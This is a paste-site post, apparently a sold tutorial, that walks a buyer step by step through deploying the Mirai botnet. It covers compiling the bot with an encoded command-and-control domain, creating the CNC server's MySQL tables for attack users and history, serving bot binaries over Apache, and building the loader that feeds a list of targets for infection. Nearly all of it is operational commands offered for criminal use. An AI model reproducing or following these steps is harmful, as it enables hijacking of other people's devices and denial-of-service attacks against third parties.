
mirai tutorial

Feb 7th, 2018
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  1. Thank you for buying my tut please contact me on skype cloroxbottles if you need any help - Cumfort
  3. First off you're gonna need the source Ive provided in the rar folder after you bought the tut
  4. You will also need putty and winSCP but im guessing you already have this because you reading my tut but if you dont here the links
  5. Putty:
  6. winSCP:
  7. 1 VPS Server at least 4gb Debian 8 x64 Heres a website for that
  8. 1 domain (link it to your cnc server) You can get a domain from here to link it get the domain u want and click use dns and put vps ip in both boxes
  9. A rough understanding on how botnets work
  10. And the files to set everything up
  12. Step 1:Drag Mirai-Source-Code-master into your vps using winSCP
  13. Step 2:Open putty and log in to your vps then run this command apt-get update -y && apt-get upgrade -y after that run this command too apt-get install gcc* -y
  14. Step 3:Run this command after that last one is finished apt-get install unzip gcc golang electric-fence screen -y
  15. Step 4:Now we want to go into the mirai source code for that run this command cd Mirai-Source-Code-master/ then run this command cd mirai/ also this one cd tools/
  16. Step 5:Then run this command gcc enc.c -o enc if you get an error run this command apt-get install gcc* -y if you dont get an error dont run that command
  17. Step 6:(Make sure domain is linked before doing the rest) Ok now run this command ./enc string (your domain name) then u should see something like this pop up \x51\x55\x43\x56\x4C\x47\x56\x51\x57\x41\x49\x51\x0C\x56\x49\x22 and a thing that says (number) amount of data copy both of those down
  18. Step 7:Then your going to do cd .. then cd bot/ now type in nano table.c and where it says TABLE_CNC_DOMAIN) in the " put that long line of number there and at the end where it says 30 replace it with whatever numbe it gave u that u copied down and do the same exact thing where it says TABLE_SCAN_CB_DOMAIN then do Ctrl x y enter
  19. Step 8:now do cd .. then do cd cnc/ now type nano main.go and go to where it says and right after that do :3306 so it would look like this "" then do Ctrl x y enter
  20. Step 9:Now run this command apt-get install mysql-client && apt-get install mysql-server -y press y when it asks Do you want to continue? Then there will be a thing that pops up asking you to make a root password for your mysql make it whatever u want just REMEMBER IT PLEASE now once that is all done edit the main.go again so do nano main.go and where it says password put what u just typed when installing mysql-client and mysql-server then put your server ip where the's are then do ctrl x y enter
  21. Step 10:Now I have provided a text file called Install Commands open that txt file and copy and paste those commands ONE BY ONE i can not stress this enough ONE BY ONE and do apt-get install git -y before running those
  22. Step 11:After you have done all that do cd then do cd Mirai-Source-Code-Master/mirai then run this command chmod 777 * after that run these commands ./ debug telnet after that runthis command ./ release telnet after that go into the release folder cd release/ and run this command apt-get install apache2 -y
  23. Step 12:Run this command mv mirai* /var/www/html then do cd then do cd /var/www/html then do mkdir bins then do mv * bins/ it will give u an error dont worry about it they still get moved to bins/
  24. Step 13:Do cd then type mysql -u root -p and put your password you saved when installing mysql-client and mysql-server once your in there type create database mirai; then type use mirai it should say database changed thats good now to add the database perms heres the big thing you need to copy and paste in there literally just copy it and paste press enter after u paste it
  26. CREATE TABLE `history` (
  27. `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  28. `user_id` int(10) unsigned NOT NULL,
  29. `time_sent` int(10) unsigned NOT NULL,
  30. `duration` int(10) unsigned NOT NULL,
  31. `command` text NOT NULL,
  32. `max_bots` int(11) DEFAULT '-1',
  33. PRIMARY KEY (`id`),
  34. KEY `user_id` (`user_id`)
  35. );
  37. CREATE TABLE `users` (
  38. `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  39. `username` varchar(32) NOT NULL,
  40. `password` varchar(32) NOT NULL,
  41. `duration_limit` int(10) unsigned DEFAULT NULL,
  42. `cooldown` int(10) unsigned NOT NULL,
  43. `wrc` int(10) unsigned DEFAULT NULL,
  44. `last_paid` int(10) unsigned NOT NULL,
  45. `max_bots` int(11) DEFAULT '-1',
  46. `admin` int(10) unsigned DEFAULT '0',
  47. `intvl` int(10) unsigned DEFAULT '30',
  48. `api_key` text,
  49. PRIMARY KEY (`id`),
  50. KEY `username` (`username`)
  51. );
  53. CREATE TABLE `whitelist` (
  54. `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  55. `prefix` varchar(16) DEFAULT NULL,
  56. `netmask` tinyint(3) unsigned DEFAULT NULL,
  57. PRIMARY KEY (`id`),
  58. KEY `prefix` (`prefix`)
  59. );
  61. Step 14:After u have done that now we make your ADMIN Login INSERT INTO users VALUES (NULL, 'Username', 'Password', 0, 0, 0, 0, -1, 1, 30, ''); Put what you want your username and password to be after u edit it copy and paste it in there and press enter
  62. Step 15:type exit it should say Bye, now do cd Mirai-Source-Code-master/mirai/release now do touch prompt.txt then do screen ./cnc it should say Mysql DB opened then open putty again and mark telnet then put either your domain or server ip and click open now it is in russian but all it says is username then password
  63. CONGRATS YOU SET UP MIRAI BOTNET! But wait theres more - Billy Maze We have to make the loader
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  67. Step 1:Do cd then do cd Mirai-Source-Code-master/dlr then do nano main.c and put your server ip where it says 127,0,0,1 and use commas not decimals or it will cause errors
  68. Step 2:chmod 777 * then do ./ then do cd release/ then do mv dlr* ~/Mirai-Source-Code-master/loader/bins
  69. Step 3:now do cd then do cd Mirai-Source-Code-master/loader/src then do nano main.c now you have to replace your server ip in a couple places look for "" all these will be in yellow by the way then look for "" and "" then finally "", 80, "" put your server ip in all of those
  70. Step 4:After that type cd .. u have replaced your server ip in there do chmod 777 * then do ./ then do ls and you should see loader now log into your server through winSCP and put a list in the loader directory I have provided you one in the folder when you bought this tut called list.txt
  71. Step 5:After u have done that do cd .. then do cd mirai/tools and do nano scanListen.go and replace your ip where the is
  72. Step 6:After that do chmod 777 * then do type this "go build scanListen.go" then do mv scanListen .. then do cd .. then do mv scanListen .. then do cd .. then do mv scanListen loader/ now to see if the loader works do cat 9.txt | ./loader
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